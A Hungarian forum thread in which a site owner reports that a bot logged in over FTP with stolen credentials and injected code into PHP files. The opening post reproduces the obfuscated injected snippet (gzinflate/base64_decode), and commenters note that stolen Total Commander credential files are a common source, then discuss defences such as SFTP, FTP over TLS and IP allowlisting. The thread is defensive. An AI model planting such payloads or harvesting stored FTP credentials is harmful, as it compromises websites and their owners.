Sziasztok!
A napokban érdekes dolgok jelentek meg néhány weboldalam(szerencsére csak hobbi célú lapok) kódjaiban, konkrétan ez:
#b58b6f#
echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#
Ez egy JS include igazából amit egy kedves valaki(gondolom valami bot) FTP-n kapcsolódás után szépen beleszórt minden index* és wp*php fájlba. Az FTP login a 31.31.79.77 IP-ről jött, az IP tulajdonosával felvettem a kapcsolatot, kaptam is választ, hogy intézik amit intézni kell... Bár a nevük is elég bizarr: wedos ... we DoS? :D
Érdekelne, hogy a jelenséggel találkozott-e már valaki rajtam kívül és hogyan sikerült meggátolnia a további jelszólopást. Gyanítom, hogy a jelszót egy Windows kliensről lopták le FTP kapcsolódás közben. Az adott gépen a vírusirtó szerint nincs semmi nem odavaló. Az is érdekelne, hogy az "abuse" jelentésre az adott ISPnek nem lenne-e kötelessége valamilyen szinten utánajárni, hogy mégis mi folyik a hálózatában? Vagy azon túl, hogy rákérdez a kedves ügyfelénél és elfogadja annak válaszát nem tehet mást? Lehet én vagyok naiv... :)
Természetesen jelszócsere volt és az IP reject-elve, szerencsére csak hobbi célú weblapokhoz fértek hozzá, az FTP accon kívül semmihez.
- 12336 megtekintés
Hozzászólások
"Gyanítom, hogy a jelszót egy Windows kliensről lopták le FTP kapcsolódás közben. "
Vagy Total Commanderből közvetlenül. Windowson elég gyakori pontja az FTP-s jelszólopásnak.
Nagyon gyakori program könnyen visszafejthető ftp jelszavakkal.
- A hozzászóláshoz be kell jelentkezni
Igen, gyakorlatilag biztos, mivel Winről két programmal FTP-ztem, bár egyikben sem tároltam jelszót. Az egyik az említett Total Commander a másik a Notepad++ FTP pluginje...
- A hozzászóláshoz be kell jelentkezni
Milyen forrásból van az a Total Commander?
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
ghisler.com, mindenféle hegesztés nélkül, az original.
- A hozzászóláshoz be kell jelentkezni
Ja, az ok (elvileg). Azért kérdezem, mert keringenek a neten mindenféle "megpatkolt" szarok is.
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Most ahogy rákérdeztél, egyébként szinte biztos vagyok, hogy nem a TC volt a ludas, hanem a Notepad++, mert TCben használtam más FTP accot is és oda még nem került szemét. De aztán lehet, hogy csak még nem.. Minden esetre jelszócsere volt ott is.
- A hozzászóláshoz be kell jelentkezni
Ugye nem CTRL C és V a jelszóbevitel? Vagy ha mégis, akkor törlöd a puffert és nem használsz semmi puffer extendert?
- A hozzászóláshoz be kell jelentkezni
Nem copy-paste, fejből.
- A hozzászóláshoz be kell jelentkezni
Asszem elég a wcx_ftp.ini -t valamilyen "remek" módon kiolvasni/elküldeni, mert a hosztot és user/pass párost oda menti a TC. Az FTP-ről elég sokakat kb. képtelenség lebeszélni
- A hozzászóláshoz be kell jelentkezni
Mi is az ftp-vel a baj? Miért kellene róla bárkit lebeszélni?
tr '[:lower:]' '[:upper:]' <<<locsemege
LOCSEMEGE
- A hozzászóláshoz be kell jelentkezni
- Alapból plain textben küld mindent (SSL-el javítható, de rohadt körülményes a felhasználóknak)
- Multiport protokoll, nehezen tűzfalazható (pl. owner iptables szabállyal)
- Nincs megoldva a fájlnevek karakterkódolása, ezért rendszeres probléma van a "nem tudom törölni a fájlomat" című játékból.
- Ha szóköz van a fájlnév elején vagy végén, dettó ugyanez a helyzet.
- Folyamatosan el kell magyarázni az end usereknek, hogy kapcsolják be a passzív módot (a többségük router mögött ül).
- Ha sok kis fájlt másolsz vele, akkor a data kapcsolatok nyitogatása rengeteg időt elvesz.
- A hozzászóláshoz be kell jelentkezni
Értem, köszönöm.
Ezek közül a plain textben utazó jelszót érzem a legsúlyosabbnak. Ékezetes fileneveket nem szoktam használni, a passzív módot be szoktam kapcsolni, az idő nem érdekel, nem kell néznem, hol tart a feltöltés, közben tudok mást csinálni.
tr '[:lower:]' '[:upper:]' <<<locsemege
LOCSEMEGE
- A hozzászóláshoz be kell jelentkezni
szemely szerint en minden cegnel uzemeltetnek egy wall-of-shame -et, segitene a nem biztonsagos protokollok migralasat.
http://blog.rootshell.be/2010/10/13/wall-of-shame-pros-cons/
Tyrael
- A hozzászóláshoz be kell jelentkezni
OK, ez a Te személyes preferenciád. Szolgáltatói oldalról viszont másként fest a helyzet.
- A hozzászóláshoz be kell jelentkezni
Először is felejtsd el az FTP-t, iszonyat sok sebből vérzik az a protokoll. Aztán nézd meg jó alaposan, ha van Windowsos géped rajta Total Commanderrel, amit. Feltöltésre használsz, mertaz esetek 99,5%-ában innen kerül ki a jelszó egy vírus regítségével. A maradék esetben a szolgáltató biztonsági beállításai nem megfelelőek. (Lásd a GitHub accomon a LAMPSecurityToolkit projektet.) Végezetül változtass jelszót és távolítsd el a szemetet.
- A hozzászóláshoz be kell jelentkezni
FTP helyett mit ajánlasz? SCP?
- A hozzászóláshoz be kell jelentkezni
Igen, az határozottan jobb. Igazából bármi jó, ami SSH-n megy.
- A hozzászóláshoz be kell jelentkezni
FTPES TLS-sel teljesen vállalható. ;) Mint már jeleztem... :P
SSH port odábbrakása halottnak a csók. Üzemi fájltranszfert amúgy is necces adminra használható szolgáltatáson keresztül végezni... Esetleg egy scponly homokozóban...
- A hozzászóláshoz be kell jelentkezni
Hogyan találja ki az iptables (helpere) a portot?
Inkább SFTP. (az openssh alrendszere)
- A hozzászóláshoz be kell jelentkezni
Remélem nem komoly a portos kérdés... :D :D
- A hozzászóláshoz be kell jelentkezni
A válasz az hogy sehogy.
- A hozzászóláshoz be kell jelentkezni
Jujj... Nem nagy varázslat pedig. A vsftpd pl. ilyesféleképp segíti a témát:
pasv_address=xxxxxxxx
pasv_min_port=xxx
pasv_max_port=xxx
Az iptables szabályokat rád bízom. ;)
- A hozzászóláshoz be kell jelentkezni
Elbeszélünk egymás mellett :((
- A hozzászóláshoz be kell jelentkezni
Igazad van: sehogy. Elnézést.
- A hozzászóláshoz be kell jelentkezni
Hát, nincs rá királyi út, de VALÓDI tls ftpes kapcsolatot ritkán csinálnak botok, hiába winscp/totalcommander/filezilla/stb. ;) Userdir szeparáció is segít a szemétszórás korlátozásában. Sajnos utólagos orvoslatra nincs ötletem... :(
subscribe amúgy az ISP kötelességeinek. Érdekelne engem is.
- A hozzászóláshoz be kell jelentkezni
egy ilyen .ftpaccess file jót tehet:
DenyAll
Allow 1.2.3.4
valamint ssh port elmozgatása máshová és csak és kizárólag sftp-n kapcsolódás
- A hozzászóláshoz be kell jelentkezni
SSH port rég nem a 22-esen van, de sajnos az IP-re korlátozás nem megoldás esetemben az FTP-nél.
- A hozzászóláshoz be kell jelentkezni
Én azt csináltam hogy az ftp-t bekorlátoztam geoip alapján .hu ra. Erősen csökkent az ftp-n keresztüli behatolások száma :>
Fedora 16, Thinkpad x61s
- A hozzászóláshoz be kell jelentkezni
Ez magától értetődően csak kevés usernél opció, hiszen ha sok ügyfeled van, akarva-akaratlan előbb utóbb belefut abba a user, hogy külföldről akar bejönni. Nekem egyszer olyat kellett debuggolnom, hogy az Oracle hálózatából jött volna a kapcsolat és mint kiderült, a usernek be kellett volna állítania egy proxyt, ami viszont Londonban végződtette volna.
- A hozzászóláshoz be kell jelentkezni
Adjál nekik vpn-t.
- A hozzászóláshoz be kell jelentkezni
Azert megnezem, hogy egy atlag Windows user konfigural maganak VPN-t, ha meg egy proxyt sem tud beallitani.
- A hozzászóláshoz be kell jelentkezni
csomag elküld, ezt rakd fel és kattints.
- A hozzászóláshoz be kell jelentkezni
milyen csomag?
Tyrael
- A hozzászóláshoz be kell jelentkezni
vpn installer. :) + ofcourse a config.
- A hozzászóláshoz be kell jelentkezni
Amit be kell masolni az openvpn telepitomappaja ala, ha ertelmesen hasznalni is szeretne (peldaul, hogy a kis talcaraulo ikonbol felbuborekoljon mint valaszthato lehetoseg).
Akkor mar inkabb a PPTP VPN, screenshotokkal megtamogatva. Az legalabb beepitett feature.
--
Ki oda vagyik, hol szall a galamb, elszalasztja a kincset itt alant. | Gentoo Portal
- A hozzászóláshoz be kell jelentkezni
Én még nem üzemeltem be, de így, hogy újra feljött a téma, most lehet rászánom magam.. csak nem igazán ügyfél barát, de a véleményetek érdekel.
Egy URL-t kell meghívnia, amin keresztül az IP címét megkapom, és ekkor engedélyezem 1 órára az ftp usert az adott IP-ről.
Nagyon fognak az ügyfelek utálni? :)
--
Joe
- A hozzászóláshoz be kell jelentkezni
(Kellene a címed)
- A hozzászóláshoz be kell jelentkezni
Probald meg a Kapcsolati urlapjat
--
Ki oda vagyik, hol szall a galamb, elszalasztja a kincset itt alant. | Gentoo Portal
- A hozzászóláshoz be kell jelentkezni
feliratkozás
tr '[:lower:]' '[:upper:]' <<<locsemege
LOCSEMEGE
- A hozzászóláshoz be kell jelentkezni
+1
--
zsebHUP-ot használok!
- A hozzászóláshoz be kell jelentkezni
+1
- A hozzászóláshoz be kell jelentkezni
+1
----------
Az Örömtündér minden évben ellátogat a Földre és akit megérint a pálcájával az Boldog lesz! De esetleg az is megtörténhet, hogy kiveri belőled még a sz*rt is... (by radcsong)
- A hozzászóláshoz be kell jelentkezni
"index* és wp*php fájlba."
mikor frissítettél wordpress-t utoljára?
- A hozzászóláshoz be kell jelentkezni
Hát amíg a kliensen ott a "jelszólopó vírus" addig mind1, nálunk belső ipcímen van az ftp-szerver, és openvpn/pptp-en bejelentkezve lehet elérni kintről....
- A hozzászóláshoz be kell jelentkezni
inkabb atfogalmazom:
eleg sok vita ment azon, hogy az IP cim onmagaban szemelyes adat-e vagy sem, de a legtobb szerv egyetertett abban, hogy a harmadik fel reszere csak elozetes engedellyel tovabbithato ez az adat.
raadasul ugye a blogpostban kvazi buncselekmeny elkoveteserol beszelunk, szoval szerintem jobb lenne ilyen kontextusban nem kiirni az eredeti IP-t.
Tyrael
- A hozzászóláshoz be kell jelentkezni
Kb. 2 éve esett át egyik szerverem egy ilyen támadássorozaton.
Cikkeztek akkortájt sokat arról, hogy egy internetes féreg köpködi ki a Windowst használó kliensekből a jelszavakat.
Tehát nem új a dolog. És a windowsról indított SCP sem ad erre megoldást, mert nem a TCP/IP kapcsolatból lopják ki a jelszót, hanem a webszerkesztő emberke Windowsából.
Az jó kérdés, hogy csak a tárolt jelszavakat, vagy mélyebb szintű a féreg működése és a szoftverből is kirántja a bepötyögött jelszót?
- A hozzászóláshoz be kell jelentkezni
Ez mindenképp valami keylogger féleség lehetett, mert jelszavakat nem szoktam letároltatni sosem. Ami még szóba jöhet, hogy a TCP streamből halászta ki a jelszót, bár ezt annyira nem tartom valószínűnek. Úgy gondolom amit tudtam azt megtettem a jövőbeli hasonló szívások elkerülése érdekében. Az viszont még érdekelne, hogy mit lehet kezdeni az ilyen gépekkel mint ahonnan bejöttek az "abuse" jelentésen túl, illetve mekkora felelőséggel bír az ISP. Tudom jól, hogy ez a host csak egy a sok ezer hasonló célú közül, de szeretnék megtenni mindent, amit meglehet ilyen esetben...
- A hozzászóláshoz be kell jelentkezni
Webhosting cegnel toltott ido alatt szerzett tapasztalat alapjan ez nehany ezer tarhely kiszolgalasa eseten legalabb napi 1 darabszamu dolog. Az erintettek nagy szazalekban TC-ben tarolt jelszoval szoktak beszivni valamilyen Windows-os ferggel. Ha nem tarolod sehol, akkor esetleg keylogger, ez ritkabb, de lehetseges. Az a vicces, hogy sokszor elofordul, hogy mas IP cim tolti le az osszes index* alaku fajlt (ratyin vannak megirva, igy az indexakarmivalami.txt formatumu fajlokat is), mint amelyik par masodperc mulva visszatolti. Kemenyen elosztott rendszer. Vedkezes egyszeruen az, hogy nincs FTP. Ez webhosting uzletagban persze nem lehetseges. Masik cegnel lattam olyat (ugyfelszivato egy kicsit, ezert mi nem vezettuk be), hogy van egy frontend, ahol meg kell adnod engedelyezett IP-ket kulon es csak azok csatlakozhatnak FTP-n. Ha Te kontrollalod az egesz szervert, akkor ez jarhato megoldas lehet neked ugy, hogy magyar IP tartomanyokra szursz, mert kevesebb magyar tagja van ezeknek a botneteknek, mint kulfoldi.
- A hozzászóláshoz be kell jelentkezni
"Masik cegnel lattam olyat (ugyfelszivato egy kicsit, ezert mi nem vezettuk be), hogy van egy frontend, ahol meg kell adnod engedelyezett IP-ket kulon"
Talán a Mediacenternél van ilyen, de nem kell tudnod az IP-det, csak be kell lépned a webes felületükre, és az az IP a köv. 24 órában ftp-zhet.
- A hozzászóláshoz be kell jelentkezni
Van pár ilyen szolgáltató és jónéhány ügyfél szereti is a funkciót, mert nem kell letakarítani a szétwarezolt Windowsukról a vírusokat.
- A hozzászóláshoz be kell jelentkezni
:) Azért tetszőleges egyszeri juzer simán belefuthat egy 0day bugot kihasználó virnyákba, lásd a szokásos képkezelő könyvtáras "carefully crafted image"-es dolgokat.
- A hozzászóláshoz be kell jelentkezni
Azert az esetek tobbsegeben olyan userekrol van szo, akiknek az automatic update ki van kapcsolva ismert okok miatt. :)
- A hozzászóláshoz be kell jelentkezni
Jó dolog az, ha csak addig tud valaki és onnan belépni ahonnan engedi. Az ilyen próbálkozások szerencsére mindíg valami érdekes helyről jöttek és nem a juzer gépéről, de ez persze változni fog ha okosodnak...
- A hozzászóláshoz be kell jelentkezni
+1
--
A legértékesebb idő a pillanat amelyben élsz.
http://phoenix-art.hanzo.hu/
https://sites.google.com/site/jupiter2005ster/
- A hozzászóláshoz be kell jelentkezni
Velem ugyanez tortent... csak totalcmd-t hasznalok ftp-re es ezen a gepen 5 db ftp volt elmentve... csak az egyikre mentek be es ott sikerult modositani az index.php fajlokat... meg is neztem a logokat nem volt probalkozas, nekem is ugyanarrol az iprol jott a behatolas es elsore bent is volt. Mindenfele virusirtas utan sem talaltam ferget... szoval ez nalam meg mindig az erdekes esetek koze tartozik.
QT
- A hozzászóláshoz be kell jelentkezni
sub
- A hozzászóláshoz be kell jelentkezni
Na, szoval csak nemi kiegeszites:
- A Total Commander maga is sebezheto, de altalaban ez a kisebbik problema. A nagyobbik gond, hogy a userek tobbsege egyszeruen nem frissiti, es igy egy olyan verzio van a gepen, ami plaintextben, vagy gyenge vedelem mellett tarolja a jelszavakat. A megoldas: mindig rakd fel a legfrissebb TC-t. Akar meg a betakat is fel lehet rakni, Ghisler nem rak ki alapszinten nem mukodo stuffot, max nehany feature meg nincs benne.
- Az FTP sem az ordogtol valo, ha korultekintoen hasznaljak. Eloszor is, nagyon bonyolult legyen a jelszo. Nem eleg az EnPortalom2012 tipusu jelszo, legyen teljesen random, es legyenek benne specko karakterek is.
- Az FTP/TLS nem rossz megoldas, sokat tud segiteni. A TC legutolso verzioja mar tudja, de asszem le kell tolteni hozza a megfelelo openssl dll-t. Ha kicsit keresgelsz a neten, talalhatsz ilyet, de nem mindegyik openssl dll jo hozza, szoval erdemes TC specifikusan keresni.
--
Ki oda vagyik, hol szall a galamb, elszalasztja a kincset itt alant. | Gentoo Portal
- A hozzászóláshoz be kell jelentkezni
Köszönöm a tippeket! Sajnos esetemben szerintem a nagyon bonyolult jelszó sem segített volna, mivel nem bruteforce volt, hanem jelszó lopás. A TC relatív friss volt szerintem, max január környékén lett letöltve és telepítve az akkori aktuális. A TLS-t azóta bekapcsoltam az FTP szerveren és fontolgatom annak a lehetőségét amit fentebb is írt valaki, hogy egy webes felületet összeütök, ahol beloginolva lehet állítani ki mikor hova tud FTP-zni.
Köszönöm a segítséget mindenkinek!
- A hozzászóláshoz be kell jelentkezni
Nem feltetlen neked irtam, inkabb altalanossagban, mert itt sokan mondtak sokfelet, amibol nagyon sokminden jo volt, de sokminden akar felrevezeto is lehetett volna.
Neked pedig: Windows Update folyamatosan legyen bekapcsolva, viruskereso telepitve, tuzfal bekapcsolva, es ha kell, tizenotszor gondold at, hogy ha valamiert szol az antivirus, akkor mire kattintasz. Es idegen geprol _nem_ FTP-zunk, annyira semmi nem lehet surgos.
--
Ki oda vagyik, hol szall a galamb, elszalasztja a kincset itt alant. | Gentoo Portal
- A hozzászóláshoz be kell jelentkezni
Plaint text ftp, year 2012.
http://www.youtube.com/watch?v=T-z8xPtifm0
"Jegyezze fel a vádhoz - utasította Metcalf őrnagy a tizedest, aki tudott gyorsírni. - Tiszteletlenül beszélt a feljebbvalójával, amikor nem pofázott közbe."
- A hozzászóláshoz be kell jelentkezni
Ha dc-zel vagy valami fájl megosztó programot használsz és a Windows / total commander mappát megosztod... ott szívás van...(FileZilla,FlashFXP stb...)
Vannak azért még olyan kiterjesztések, amiket nem osztanék meg :):)
Sok felhasználó nem gondolkodik... elmenti a jelszavát egy új szöveges dokumentumba,de ami a legrosszabb: "password.txt, jelszo.txt, poker.txt stb...*.vnc,*.rdp..." - de az ilyenek meg is érdemlik...
- A hozzászóláshoz be kell jelentkezni